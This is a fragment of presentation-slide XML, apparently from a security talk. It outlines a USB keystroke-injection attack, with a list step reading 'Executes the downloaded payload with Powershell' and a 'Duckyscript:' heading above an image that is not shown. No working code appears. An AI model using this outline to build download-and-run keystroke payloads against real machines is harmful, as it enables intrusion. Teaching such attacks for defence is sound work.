          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Executes the downloaded payload with Powershell</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="128" name="Google Shape;128;p21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8407525" y="67075"/>
            <a:ext cx="736475" cy="736475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="Google Shape;129;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1017713"/>
            <a:ext cx="8520600" cy="44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latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Duckyscript:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="130" name="Google Shape;130;p21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5063513" y="2924938"/>
            <a:ext cx="3819525" cy="1971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